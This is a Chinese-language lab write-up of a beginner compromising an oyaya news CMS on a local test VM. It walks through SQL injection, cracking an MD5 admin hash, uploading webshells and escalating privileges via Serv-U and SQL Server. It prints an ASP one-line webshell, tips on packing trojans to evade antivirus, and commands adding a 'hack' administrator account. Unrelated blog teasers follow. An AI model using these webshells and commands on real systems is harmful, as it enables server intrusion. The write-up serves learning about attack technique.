web攻擊oyaya新聞管理系統
1.環境配置
win server2003伺服器配置,其中整合了
iss管理器,
oyaya
新聞管理系統,
serv-u
等實驗配置環境,還安裝了攻擊工具,例如啊
d注入工具,中國菜刀,實現
web攻擊。
2.操作流程
1.掃瞄目標**192.168.227.131即安裝在本機的
oyaya
新聞管理系統,尋找注入點
圖1 掃瞄注入點
2.從圖中可以發現找出1個注入點,雙擊可用注入點進入
sql注入檢測,從而查詢表中的內容,找出關鍵字段的值,從而
。圖2 sql注入檢測,找出密碼的
hash值
3.這裡找出hash值後我就可以開始暴力破解,但有時一些
hash
解密比較慢,一時半會無法破解,可以嘗試繞過管理員登入介面,直接進入後台,現在許多**仍存在
cookie
驗證漏洞,可以嘗試繞過去。由於我是初學者,暫時還沒有掌握繞過方法,暫時通過**暴力破解解密出找出的
hash值。
找出hash值:
[admin] : admin
[password] : 4f423c383611d687315cc2b6ca790d25
[admin] : oyaya
[password] : 4f423c383611d687315cc2b6ca790d25
先通過kali linux中
hash-indentifier
確認hash
值的加密型別
圖3 確認加密型別
確認加密型別為md5後,通過上網查詢解密後:
您查詢的字串是「4f423c383611d687315cc2b6ca790d25」,
解密結果為:「
www.oyaya.net」!
4.我現在已經拿到管理員帳號和密碼,開始準備獲取webshell。先通過管理入口查詢找出**目錄,先上傳小馬。
圖4 檢測出的管理入口
5.讀取c盤目錄
圖5 讀取
c盤目錄
6.先登入後台看有沒有可以利用的後台
圖6.1 登入後台管理系統
圖6.2 後台管理系統
未找到可利用的後台資料庫備份,開始嘗試上傳小馬
7.方法一:
使用啊d中
cmd/
上傳功能找出
oyaya
資料庫位置,上傳小馬
圖7 上傳小馬
8.通過小馬鏈結上傳大馬
圖8 上傳大馬
9.鏈結之大馬,檢視大馬原始檔得知密碼為asd,登入進去,拿下
webshell
圖9 登入大馬,拿下
webshell
注意:這個上傳小馬或者是大馬的這個過程也會出現一些意外情況,比如伺服器端安裝了防毒軟體,直接將小馬或大馬刪除了,這個時候我們可以對準備上傳的木馬檔案進行一些加殼操作,使得它能夠免殺。
10.獲取系統管理員許可權
通過server-u本地提權漏洞獲取作業系統的管理員許可權,利用大馬中提供的
server-u
提權**獲取管理員許可權:
圖10.1 通過大馬提權
圖10.2 提權完成
11.方法二:
在上傳小馬那一步改為上傳輕便不易查殺的一句話木馬,口令為ckf
<%execute request("ckf")%>
圖11 上傳一句話木馬
12.通過拿站比較方便的中國菜刀用口令進入資料庫,上傳大馬
圖12 用中國菜刀鏈結一句話木馬
13.其實這是已經可以操控整個**,為了方便,上傳大馬拿下webshell
圖13 上傳大馬
14.鏈結是大馬拿下webshell,提權同上
圖14.1 登入大馬,拿下
webshell
圖14.2 拿下
webshell
15.提權問題
以上提權方法只適用於serv-u6.0以前,由於之後的使用者的路徑發生改變,上述方法不適用,所以總結了下列的方法。
16.serv-u15.0提權的方法試驗
16.1.通過瀏覽
serv-u
的安裝目錄找出目前版本的使用者檔案儲存的路徑,在
user
目錄下,通過查閱本機的
oyaya.archive
檔案找出
serv-u
的使用者名稱和密碼。
圖16.1 得知伺服器的使用者名稱和密碼
16.2通過登入
serv-u
,使用設定的埠
8088
檢視獲知的使用者的許可權,發現只是個普通使用者,看樣子我還需要自己創個系統管理員。
圖16.2.1 登入介面
圖16.2.2 登入到
web客戶端
16.3用自己本機上的
serv-u
自己創個系統管理員
test
,再把test
使用者的資訊通過大馬上傳到伺服器中,用新創的
test
使用者登入。
圖16.3.1 自己創的管理員使用者
test
圖16.3.2 用
test登入
圖16.3.3 登入到
serv-u
管理介面
16.4嘗試登入到
ftp中新建立乙個系統管理員員
圖16.4 通過
serv-u
提權失敗
登入到ftp,新建系統使用者並沒有許可權,嘗試通過
serv-u
提權失敗。接下來換個思路,嘗試通過
sql server
提權。
17.sql server提權
17.1通過大馬搜尋**目錄下的敏感資訊,例如
conn.asp檔案
圖17.1 搜尋**的敏感檔案
system
許可權。
圖17.2 找出資料庫相關資訊
17.3通過大馬上自帶的執行
sqlcmd
命令功能,新增使用者
hack
,密碼為
hack
,新增到系統管理員使用者組中。執行下列命令:
net user hack hack /add
net localgroup administrators hack /add
圖17.3.1 新增使用者
hack
圖17.3.2 把使用者
hack
加到管理員組中,獲得管理員許可權
17.4此時已經成功提權。掃瞄埠發現
3389
埠開放,可以通過物理機遠端登入伺服器,並用剛才建立的系統管理員
hack
登入進去,成功拿下**。
圖17.4.1 遠端登入伺服器
圖17.4.2 利用新建的系統管理員
hack登入
圖17.4.3 成功登入進入伺服器
18.自此,成功拿下乙個簡單的
oyaya
新聞管理系統的**,了解了滲透攻擊**的流程,熟悉了一些攻擊方法和攻擊工具。
3.總結
本次實驗主要學習了**伺服器滲透測試的基本流程,由於是初學者,所以使用了工具進行攻擊,不過也基本熟悉了一些攻擊方式,接下來需要深入了解攻擊原理和學會自己編寫指令碼進行攻擊。黑客的技術要與時俱進,隨著人們安全意識的提公升,可能攻擊需要另闢蹊徑,在技術層面要學習新的安全知識和防禦這些攻擊,在社工方面黑客往往抓住人性的弱點,我也必須提高自己的安全知識。
嗯,由於限制沒傳上去,給自己勉勵自己曾經折騰過經歷!
菜鳥的it之路 起航
之前在知乎上看見怎麼學習資料結構下一位答主的回答,他引用了n.wirth 沃斯 的話 程式 資料結構 演算法。哈,菜鳥無法驗證這句話的正確性有多大 但毫無疑問的是,資料結構應當是一名菜鳥程式狗要重點學習的東西,是不可忽略的一部分。所以,這篇隨筆我將列出接下來一段時間我的資料結構學習計畫 菜鳥的爬行路...
我的家庭 Server 折騰之路
家中目前常用裝置較多,台式電腦 1,筆記本 2,android 1,ios 2,所以產生了下面幾個問題 雲平台不統一 pc 裝置統一用了 onedrive,存在同步較慢問題,android 購買了一加的雲服務,ios 購買了 icloud 雲服務,我想要的是丟裝置,回憶不丟失 基於上述幾個原因,考慮...
webpack 菜鳥的學習之路
webpack 是如何實現 hmr 的?實現的原理如何?本場 chat 會以完整的例項來展示hmr 的實現原理,包括 less scss css 檔案的熱載入。webpack 的 watch 模式與一次性打包如何實現?他們的主要區別是什麼?webpack 與 prepack 的關係?如何在 webp...